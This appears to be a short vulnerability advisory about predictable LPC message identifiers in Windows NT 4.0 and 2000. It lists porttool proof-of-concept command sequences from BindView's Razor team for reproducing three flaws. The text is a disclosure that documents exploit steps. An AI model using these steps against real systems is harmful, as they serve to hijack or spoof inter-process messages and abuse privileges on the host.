Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities
Bindview's Razor Team has provided a proof-of-concept tool (porttool.zip) to demonstrate the vulnerabilities that exist in Microsoft NT's implementation of LPC. The following commands correspond with the specified vulnerabilities detailed under the 'Discussion' tab:

Vulnerability #1:
    start porttool -s \BaseNamedObjects\Foo
    start porttool -c \BaseNamedObjects\Foo
    porttool -s1
    (enter PID, TID, and MID printed by porttool -s)

Vulnerability #2:
    start porttool -s5a \BaseNamedObjects\Foo
    start porttool -c5a-1 \BaseNamedObjects\Foo
    porttool -c5a-2 \BaseNamedObjects\Foo
    (enter PID, TID, MID, CID from porttool -s5)

Vulnerability #3:
    start porttool -s5b \BaseNamedObjects\Foo
    start porttool -s5b-2 \BaseNamedObjects\Foo2
    porttool -c5b \BaseNamedObjects\Foo \BaseNamedObjects\Foo2
    (wait until MIDs wrap around)
    start porttool -s \BaseNamedObjects\Foo3
    porttool -c \BaseNamedObjects\Foo3
    (in window for porttool -s5b)
    Enter PID, TID, MID, CID from porttool -s